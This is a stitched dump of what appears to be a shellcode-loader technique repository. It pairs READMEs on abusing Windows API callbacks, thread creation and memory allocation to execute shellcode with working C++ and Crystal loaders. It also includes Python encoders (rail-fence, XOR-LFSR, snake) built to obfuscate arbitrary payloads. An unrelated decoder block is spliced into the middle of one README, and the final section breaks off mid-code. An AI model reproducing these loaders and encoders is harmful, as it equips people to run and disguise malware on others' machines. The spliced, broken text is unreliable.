Abusing callback to run shellcode.

### Overview

Execute shellcode with `DPA_EnumCallback`.

```c++
void DPA_EnumCallback (HDPA hdpa, PFNDAENUMCALLBACK pfnCB, void *pData);

HDPA DPA_Create (int cItemGrow);

BOOL DPA_Destroy (HDPA hdpa);

int DPA_InsertPtr (HDPA hdpa, int i, void *p);
```

### Reference

- [MSDN DPA_EnumCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_enumcallback)
- [MSDN DPA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_create)
- [MSDN DPA_Destroy](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_destroy)
- [MSDN DPA_InsertPtr](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_insertptr)
--------------------------------------------------------------------------------
/windows/writing/permutation/rail-fence/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
shlen = len(shcode)

# encode the shellcode: key = number of rails, stored as the first byte
key = random.randrange(2, 10)
enc_shcode = [key] + [0 for c in range(shlen)]

# p = write position in the output, s = the two alternating gaps
# between consecutive bytes on the same rail
p = 1
s = [(key-1)*2, 0]

for i in range(0, key):
    j = i
    idx = 0

    # walk rail i through the shellcode, alternating the two gaps
    while j < shlen:
        enc_shcode[p] = shcode[j]

        if s[idx] > 0:
            j += s[idx]
            p += 1

        idx = (idx + 1) & 1

    # next rail: the first gap shrinks, the second grows
    s[0] -= 2
    s[1] += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
print(f"Length: {len(enc_shcode)}")
--------------------------------------------------------------------------------
/windows/writing/custom/xor-lfsr/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()

# generate single byte key (the LFSR seed), stored as the first byte
seed = random.randrange(1, 255)

# xor-encrypt
enc_shcode = [seed]

state = seed
taps = [8, 6, 5, 4]
for c in shcode:
    # generate value from LFSR
    feedback = 0
    for tap in taps:
        feedback ^= (state >> (tap - 1)) & 1

    feedback ^= (state ^ (state >> 3)) & 1
    state = ((state << 1) | feedback) & 0xFF

    # XOR with shellcode byte
    enc_shcode.append(c ^ state)

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")

print(f"Length: {len(enc_shcode)}")
--------------------------------------------------------------------------------
/windows/execution/callback/DSA_EnumCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DSA_EnumCallback`.

```c++
void DSA_EnumCallback (HDSA hdsa, PFNDAENUMCALLBACK pfnCB, void *pData);

HDSA DSA_Create (int cbItem, int cItemGrow);

BOOL DSA_Destroy (HDSA hdsa);

int DSA_InsertItem (HDSA hdsa, int i, const void *pitem);
```

### Reference

- [MSDN DSA_EnumCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_enumcallback)
- [MSDN DSA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create)
- [MSDN DSA_Destroy](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_destroy)
- [MSDN DSA_InsertItem](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumResourceNamesEx`.

Enumerate the resource names of a given type inside a module and run the callback to process each resource that is found.
```c++
BOOL EnumResourceNamesExA (HMODULE hModule, LPCSTR lpType, ENUMRESNAMEPROCA lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);

BOOL EnumResourceNamesExW (HMODULE hModule, LPCWSTR lpType, ENUMRESNAMEPROCW lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);
```

### Reference

- [MSDN EnumResourceNamesExA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesexa)
- [MSDN EnumResourceNamesExW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesexw)
--------------------------------------------------------------------------------
/windows/execution/callback/SendMessageCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `SendMessageCallback`. The function sends a message to a window and runs the callback once the window procedure has processed the message. If the window belongs to the calling thread, the window procedure and then the callback run synchronously; if it belongs to another thread, the callback only runs when the sending thread next processes its message queue, so the loader pumps messages to trigger it.
```c++
BOOL SendMessageCallbackA (HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, SENDASYNCPROC lpResultCallBack, ULONG_PTR dwData);

BOOL SendMessageCallbackW (HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, SENDASYNCPROC lpResultCallBack, ULONG_PTR dwData);
```

### Reference

- [MSDN SendMessageCallbackA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-sendmessagecallbacka)
- [MSDN SendMessageCallbackW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-sendmessagecallbackw)
--------------------------------------------------------------------------------
/windows/allocation/GlobalAlloc-GHND/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocate with `GlobalAlloc` and obtain a handle to the allocated block; the buffer address is obtained with `GlobalLock`. With `GHND` (`GMEM_MOVEABLE | GMEM_ZEROINIT`) the return value is a handle rather than a pointer, so `GlobalLock` is required before the block can be written and `GlobalUnlock` afterwards. The block lives on the process heap and is not executable; it has to be made executable (for example with `VirtualProtect`) before the shellcode can run.

```c++
HGLOBAL GlobalAlloc (UINT uFlags, SIZE_T dwBytes);

LPVOID GlobalLock (HGLOBAL hMem);

BOOL GlobalUnlock (HGLOBAL hMem);

HGLOBAL GlobalFree (HGLOBAL hMem);
```

### Reference

- [MSDN GlobalAlloc](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalalloc)
- [MSDN GlobalLock](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globallock)
- [MSDN GlobalUnlock](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalunlock)
- [MSDN GlobalFree](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalfree)
--------------------------------------------------------------------------------
/windows/execution/event/RegisterWaitForSingleObject/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode from a wait callback (fired when an event is signaled or the wait times out).
### Overview

Execute shellcode with `RegisterWaitForSingleObject`. The callback (`WAITORTIMERCALLBACK`) runs on a thread-pool thread when `hObject` becomes signaled or when `dwMilliseconds` elapses, so the loader creates an event with `CreateEventA`, registers the shellcode address as the callback, and either signals the event or lets the timeout expire. The registration is released with `UnregisterWait`.

```c++
BOOL RegisterWaitForSingleObject (PHANDLE phNewWaitObject, HANDLE hObject, WAITORTIMERCALLBACK Callback, PVOID Context, ULONG dwMilliseconds, ULONG dwFlags);

HANDLE CreateEventA (LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);

BOOL UnregisterWait (HANDLE WaitHandle);
```

### Reference

- [MSDN RegisterWaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-registerwaitforsingleobject)
- [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
- [MSDN UnregisterWait](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-unregisterwait)
--------------------------------------------------------------------------------
/windows/storage/section/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    storing payload as separate section

    Compile:
    $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
    - allocation: n/a (the payload lives in its own section)
    - writing: n/a
    - permission: n/a (the section is declared execute,read)
    - execution: CreateThread
*/

#include <windows.h>
#include <stdint.h>

// create a new executable section and place the payload in it
#pragma section(".code", execute, read)
__declspec(allocate(".code"))
uint8_t payload[] = { 0x90, 0x90, 0xCC, 0xC3 };


int main ()
{
    HANDLE th_shellcode;
    void * runtime = payload;

    // execute shellcode directly from the section: no allocation, copy or
    // VirtualProtect is needed because the section is already R-X
    th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0);
    if (th_shellcode == NULL)
        return 1;

    WaitForSingleObject (th_shellcode, INFINITE);
    CloseHandle (th_shellcode);

    return 0;
}
/windows/execution/callback/EnumDirTree/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDirTree` (dbghelp). `SymInitialize` must be called for `hProcess` first; `EnumDirTree` then walks the directory tree under `RootPath` and calls `cb` for every file that matches `InputPathName`, with the shellcode address supplied as `cb`. If no file matches, the callback never runs.

```c++
BOOL IMAGEAPI EnumDirTree (HANDLE hProcess, PCSTR RootPath, PCSTR InputPathName, PSTR OutputPathBuffer, PENUMDIRTREE_CALLBACK cb, PVOID data);

BOOL IMAGEAPI EnumDirTreeW (HANDLE hProcess, PCWSTR RootPath, PCWSTR InputPathName, PWSTR OutputPathBuffer, PENUMDIRTREE_CALLBACKW cb, PVOID data);

BOOL IMAGEAPI SymInitialize (HANDLE hProcess, PCSTR UserSearchPath, BOOL fInvadeProcess);
```

### Reference

- [MSDN EnumDirTree](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumdirtree)
- [MSDN EnumDirTreeW](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumdirtreew)
- [MSDN SymInitialize](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-syminitialize)
--------------------------------------------------------------------------------
/windows/allocation/VirtualAllocEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocate with `VirtualAllocEx` and free with `VirtualFreeEx`. The `hProcess` parameter selects the target process; passing `GetCurrentProcess()` allocates in the loader's own process, equivalent to `VirtualAlloc`.
```c++
LPVOID VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);

BOOL VirtualProtectEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);

BOOL VirtualFreeEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
```

### Reference

- [MSDN VirtualAllocEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex)
- [MSDN VirtualProtectEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex)
- [MSDN VirtualFreeEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfreeex)
--------------------------------------------------------------------------------
/windows/execution/event/timeSetEvent/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode using timer.

### Overview

Execute shellcode with `timeSetEvent` (winmm).

This function is obsolete. With `fuEvent` set to `TIME_ONESHOT | TIME_CALLBACK_FUNCTION`, `lpTimeProc` is called once from a separate timer thread after `uDelay` milliseconds, so the calling thread has to keep the process alive (with `Sleep` or a wait) until the callback has run.
```c++
MMRESULT timeSetEvent (UINT uDelay, UINT uResolution, LPTIMECALLBACK lpTimeProc, DWORD_PTR dwUser, UINT fuEvent);

MMRESULT timeKillEvent (UINT uTimerID);

MMRESULT timeBeginPeriod (UINT uPeriod);

MMRESULT timeGetDevCaps (LPTIMECAPS ptc, UINT cbtc);
```

### Reference

- [MSDN timeSetEvent](https://docs.microsoft.com/en-us/previous-versions//dd757634(v=vs.85))
- [MSDN timeKillEvent](https://docs.microsoft.com/en-us/previous-versions//dd757630(v=vs.85))
- [MSDN timeGetDevCaps](https://docs.microsoft.com/en-us/windows/win32/api/timeapi/nf-timeapi-timegetdevcaps)
- [MSDN timeBeginPeriod](https://docs.microsoft.com/en-us/windows/win32/api/timeapi/nf-timeapi-timebeginperiod)
--------------------------------------------------------------------------------
/windows/allocation/VirtualAlloc2/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocate with `VirtualAlloc2` and free with `VirtualFree`. `VirtualAlloc2` is the newer form of `VirtualAllocEx` (Windows 10 1803 and later, exported by kernelbase.dll); `Process` may be `NULL` for the current process, and the extended-parameter list allows constraints such as an address range that `VirtualAlloc` cannot express.
```c++
LPVOID VirtualAlloc2 (HANDLE Process, PVOID BaseAddress, SIZE_T Size, ULONG AllocationType, ULONG PageProtection, MEM_EXTENDED_PARAMETER *ExtendedParameters, ULONG ParameterCount);

BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);

BOOL VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
```

### Reference

- [MSDN VirtualAlloc2](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc2)
- [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)
- [MSDN VirtualFree](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree)
--------------------------------------------------------------------------------
/windows/writing/permutation/snake/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen = len(shcode)

# encode the shellcode
# how many rows?
rows = random.randrange(2, 5)

# pad with zero bytes so the shellcode divides evenly into rows
remainder = shlen % rows
if remainder > 0:
    extra = (rows - remainder)

    shlen += extra
    shcode += b"\x00" * extra

cols = shlen // rows
# the row count is emitted as the first byte so the loader can undo the permutation
enc_shcode = [rows]

for r in range(0, rows):
    start = r * cols
    end = (r + 1) * cols

    shrow = shcode[start:end]

    # odd rows are written back to front (the "snake" path)
    if r % 2 == 1:
        enc_shcode += shrow[::-1]
    else:
        enc_shcode += shrow

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
print(f"Length: {len(enc_shcode)}")
--------------------------------------------------------------------------------
/windows/execution/thread/CreateThreadpoolWork/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CreateThreadpoolWork`, `SubmitThreadpoolWork`, and `WaitForThreadpoolWorkCallbacks`. The shellcode address is passed as the `PTP_WORK_CALLBACK`; a thread-pool worker invokes it after `SubmitThreadpoolWork`, and `WaitForThreadpoolWorkCallbacks` blocks the main thread until the work item has finished.
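The snake `generate.py` above stores the row count in the first byte and reverses every odd row. This added C decoder (my own code, not the repository's loader) undoes that permutation on the loader side and rejects input whose length is not a multiple of the row count, which the encoder guarantees by padding. The self-test uses two constructed inputs: a 2-row `ABCDEF` and the archive's 4-byte stub padded to 3 rows.

```c
/* Added example (not repository code): decoder for the snake permutation. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Undo the snake permutation. enc[0] is the row count, the rest is the padded
 * shellcode row by row with odd rows reversed. Returns the number of bytes
 * written to `out` (including the encoder's zero padding), or 0 if malformed. */
static size_t snake_decode(const uint8_t *enc, size_t enc_len, uint8_t *out)
{
    if (enc_len < 2) return 0;
    size_t rows = enc[0];
    size_t len  = enc_len - 1;
    if (rows == 0 || len % rows != 0) return 0;  /* encoder always pads to a multiple of rows */
    size_t cols = len / rows;

    for (size_t r = 0; r < rows; r++) {
        const uint8_t *row = enc + 1 + r * cols;
        for (size_t c = 0; c < cols; c++) {
            /* odd rows were stored back to front, so read them from the end */
            size_t src = (r % 2 == 1) ? (cols - 1 - c) : c;
            out[r * cols + c] = row[src];
        }
    }
    return len;
}

/* Self-test on constructed inputs; returns 1 if every case decodes as expected. */
static int snake_decode_selftest(void)
{
    uint8_t out[16];

    /* rows=2, "ABCDEF": row 0 "ABC" as-is, row 1 "DEF" stored reversed as "FED" */
    const uint8_t two_rows[] = { 2, 'A', 'B', 'C', 'F', 'E', 'D' };
    if (snake_decode(two_rows, sizeof two_rows, out) != 6) return 0;
    if (memcmp(out, "ABCDEF", 6) != 0) return 0;

    /* rows=3 on 90 90 CC C3 padded to 6 bytes: rows [90 90] [CC C3]->[C3 CC] [00 00] */
    const uint8_t three_rows[] = { 3, 0x90, 0x90, 0xC3, 0xCC, 0x00, 0x00 };
    const uint8_t expect[] = { 0x90, 0x90, 0xCC, 0xC3, 0x00, 0x00 };
    if (snake_decode(three_rows, sizeof three_rows, out) != 6) return 0;
    if (memcmp(out, expect, 6) != 0) return 0;

    /* 4 data bytes cannot form 3 equal rows: must be rejected */
    const uint8_t bad[] = { 3, 1, 2, 3, 4 };
    if (snake_decode(bad, sizeof bad, out) != 0) return 0;

    return 1;
}
```

The decoder returns the padded length; the trailing zero bytes are harmless for the loader (they follow the shellcode's final instruction) but a loader that stores the original length elsewhere can trim them.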
```c++
PTP_WORK CreateThreadpoolWork (PTP_WORK_CALLBACK pfnwk, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);

void SubmitThreadpoolWork (PTP_WORK pwk);

void WaitForThreadpoolWorkCallbacks (PTP_WORK pwk, BOOL fCancelPendingCallbacks);
```

### Reference

- [MSDN CreateThreadpoolWork](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpoolwork)
- [MSDN SubmitThreadpoolWork](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-submitthreadpoolwork)
- [MSDN WaitForThreadpoolWorkCallbacks](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-waitforthreadpoolworkcallbacks)
--------------------------------------------------------------------------------
/windows/execution/thread/NtCreateThreadEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Execute shellcode with `NtCreateThreadEx` and wait for completion with `WaitForSingleObject`.

`NtCreateThreadEx` is an undocumented, low-level ntdll function. It is not declared in the Windows SDK headers, so loaders resolve it with `GetProcAddress` on ntdll; the prototype below comes from public reverse engineering, not from Microsoft documentation.
```c++
NTSTATUS NtCreateThreadEx (PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID lpStartAddress, PVOID lpParameter, ULONG flags, SIZE_T szStackZeroBits, SIZE_T szStackCommitSize, SIZE_T szStackReserveSize, PVOID lpBytesBuffer);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateRemoteThreadEx (the documented wrapper over NtCreateThreadEx)](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
--------------------------------------------------------------------------------
/windows/writing/copy/CreatePipe/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copy the shellcode through an anonymous pipe (`CreatePipe`, `WriteFile`, and `ReadFile`): the bytes are written into the write end and read back from the read end into the target buffer. Anonymous pipes are synchronous, so a single-threaded loader must request a pipe buffer (`nSize`) at least as large as the payload; a `WriteFile` larger than the pipe buffer blocks until a reader drains it, and with both ends on the same thread that deadlocks.
```c++
BOOL CreatePipe (PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize);

BOOL WriteFile (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);

BOOL ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
```

### Reference

- [MSDN CreatePipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-createpipe)
- [MSDN WriteFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile)
- [MSDN ReadFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile)
--------------------------------------------------------------------------------
/windows/allocation/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

The `allocation` techniques create enough space to hold the shellcode after it has been extracted from its storage (global/stack/resource/download). The allocated memory must be marked executable; otherwise DEP (Data Execution Prevention) raises an exception when control is transferred into it.
### Catalog

Implemented `allocation` techniques:

- [AllocADsMem](AllocADsMem)
- [CoTaskMemAlloc](CoTaskMemAlloc)
- [CreateFileMapping](CreateFileMapping)
- [GlobalAlloc-GHND](GlobalAlloc-GHND)
- [GlobalAlloc-GPTR](GlobalAlloc-GPTR)
- [HeapAlloc](HeapAlloc)
- [NtAllocateVirtualMemory](NtAllocateVirtualMemory)
- [NtCreateSection](NtCreateSection)
- [NtCreateSectionEx](NtCreateSectionEx)
- [RtlAllocateHeap](RtlAllocateHeap)
- [VirtualAlloc](VirtualAlloc)
- [VirtualAlloc2](VirtualAlloc2)
- [VirtualAllocEx](VirtualAllocEx)
--------------------------------------------------------------------------------
/windows/allocation/HeapAlloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocate with `HeapAlloc`, but from a separate heap created with `HeapCreate` rather than the default process heap. The reason is that `HeapCreate` accepts `HEAP_CREATE_ENABLE_EXECUTE`, which makes every block allocated from that heap executable, while there is no supported way to add that flag to the existing process heap.
```c++
LPVOID HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);

HANDLE HeapCreate (DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize);

BOOL HeapFree (HANDLE hHeap, DWORD dwFlags, _Frees_ptr_opt_ LPVOID lpMem);

BOOL HeapDestroy (HANDLE hHeap);
```

### Reference

- [MSDN HeapAlloc](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc)
- [MSDN HeapCreate](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapcreate)
- [MSDN HeapFree](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapfree)
- [MSDN HeapDestroy](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapdestroy)
--------------------------------------------------------------------------------
/windows/execution/thread/RtlCreateUserThread/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Execute shellcode with `RtlCreateUserThread` and wait for completion with `WaitForSingleObject`.

`RtlCreateUserThread` is an undocumented, low-level ntdll function; the prototype below follows the NTInternals description rather than any official header.
```c++
NTSTATUS RtlCreateUserThread (HANDLE ProcessHandle, PSECURITY_DESCRIPTOR SecurityDescriptor, BOOLEAN CreateSuspended, ULONG StackZeroBits, PULONG StackReserved, PULONG StackCommit, PVOID StartAddress, PVOID StartParameter, PHANDLE ThreadHandle, PCLIENT_ID ClientID);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [NTInternals RtlCreateUserThread](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FRtlCreateUserThread.html)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
--------------------------------------------------------------------------------
/windows/storage/stack/crystal/code.cr:
--------------------------------------------------------------------------------
# Shellcode Loader
# Archive of Reversing.ID
#
# storing payload in stack
#
# Run:
#   $ crystal code.cr
#
# Technique:
#   - allocation: VirtualAlloc
#   - writing: memcpy
#   - permission: VirtualProtect
#   - execution: invoke directly

# define PAGE_EXECUTE_READ because it's not defined in lib
PAGE_EXECUTE_READ = 0x20

# shellcode storage in stack
payload = IO::Memory.new Bytes[ 0x90, 0x90, 0xCC, 0xC3 ]

# allocate memory buffer for payload as READ-WRITE (no executable)
runtime = LibC.VirtualAlloc(nil, payload.size, LibC::MEM_COMMIT | LibC::MEM_RESERVE, LibC::PAGE_READWRITE)

# copy payload to the buffer
Intrinsics.memcpy(runtime, payload.buffer, payload.size, false)

# make buffer executable (R-X)
LibC.VirtualProtect(runtime, payload.size, PAGE_EXECUTE_READ, out _)

# execute the payload: wrap the raw code pointer in a Proc and call it
t = Proc(Int32).new(runtime, runtime)
t.call
/windows/execution/callback/WsPullBytes/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `WsPullBytes` (webservices). `WsCreateWriter` creates the XML writer and `WsSetOutput` attaches an output to it; the shellcode address is then passed as the `WS_PULL_BYTES_CALLBACK`.

```c++
HRESULT WsPullBytes (WS_XML_WRITER *writer, WS_PULL_BYTES_CALLBACK callback, void *callbackState, WS_ERROR *error);

HRESULT WsCreateWriter (const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_XML_WRITER **writer, WS_ERROR *error);

HRESULT WsSetOutput (WS_XML_WRITER *writer, const WS_XML_WRITER_ENCODING *encoding, const WS_XML_WRITER_OUTPUT *output, const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_ERROR *error);
```

### Reference

- [MSDN WsPullBytes](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wspullbytes)
- [MSDN WsCreateWriter](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wscreatewriter)
- [MSDN WsSetOutput](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wssetoutput)
--------------------------------------------------------------------------------
/windows/execution/callback/WsPushBytes/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `WsPushBytes` (webservices), the push counterpart of `WsPullBytes`: the writer is created with `WsCreateWriter`, given an output with `WsSetOutput`, and the shellcode address is passed as the `WS_PUSH_BYTES_CALLBACK`.
```c++
HRESULT WsPushBytes (WS_XML_WRITER *writer, WS_PUSH_BYTES_CALLBACK callback, void *callbackState, WS_ERROR *error);

HRESULT WsCreateWriter (const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_XML_WRITER **writer, WS_ERROR *error);

HRESULT WsSetOutput (WS_XML_WRITER *writer, const WS_XML_WRITER_ENCODING *encoding, const WS_XML_WRITER_OUTPUT *output, const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_ERROR *error);
```

### Reference

- [MSDN WsPushBytes](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wspushbytes)
- [MSDN WsCreateWriter](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wscreatewriter)
- [MSDN WsSetOutput](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wssetoutput)
--------------------------------------------------------------------------------
/windows/writing/custom/bit-swap/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

`Bit-Mixing` is a bit-manipulation technique that combines bits from different data blocks to produce a new block, using `XOR`, `AND`, `OR`, shifts, and rotations.

Any `Bit-Mixing` applied to shellcode must be an invertible process; otherwise the loader cannot recover the original bytes.

`Swap` is a variant of bit mixing that exchanges bits between two data blocks. It can also be described as the more generic `Cross-Over`.

The data block consists of two components, `Left` and `Right`. Take `N` bits starting at position `P` from both `Left` and `Right` and exchange the two bit slices.
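An added C implementation of the swap just described (my own code, not the repository's): `bitswap_mask` builds the extract mask for an arbitrary `N`/`P`, and the fixed-mask routines use the 4-bit slice at bit positions 1 through 4 that this README's `0x1E` / `0xE1` masks select. The swap is applied to consecutive byte pairs of a buffer, and because it only moves bits between the two slices, the same call both encodes and decodes.

```c
/* Added example (not repository code): Left/Right bit swap on byte pairs. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SWAP_EXTRACT 0x1E   /* bits 1..4, the slice exchanged between L and R */
#define SWAP_CLEAR   0xE1   /* ~SWAP_EXTRACT: the bits that stay in place */

/* extract mask for n bits starting at bit p (p + n <= 8); e.g. p=1,n=4 -> 0x1E */
static uint8_t bitswap_mask(unsigned p, unsigned n)
{
    if (n == 0 || p + n > 8) return 0;
    return (uint8_t)(((1u << n) - 1u) << p);
}

/* L' = clear(L) | extract(R);  R' = clear(R) | extract(L) */
static void bitswap_pair(uint8_t *left, uint8_t *right)
{
    uint8_t l = *left, r = *right;
    *left  = (uint8_t)((l & SWAP_CLEAR) | (r & SWAP_EXTRACT));
    *right = (uint8_t)((r & SWAP_CLEAR) | (l & SWAP_EXTRACT));
}

/* same swap with a caller-chosen slice; the involution property holds for any mask */
static void bitswap_pair_np(uint8_t *left, uint8_t *right, unsigned p, unsigned n)
{
    uint8_t extract = bitswap_mask(p, n), clear = (uint8_t)~extract;
    uint8_t l = *left, r = *right;
    *left  = (uint8_t)((l & clear) | (r & extract));
    *right = (uint8_t)((r & clear) | (l & extract));
}

/* Transform buf in place, pairing bytes (0,1), (2,3), ...; a trailing odd byte
 * has no partner and is left unchanged. Calling twice restores the input. */
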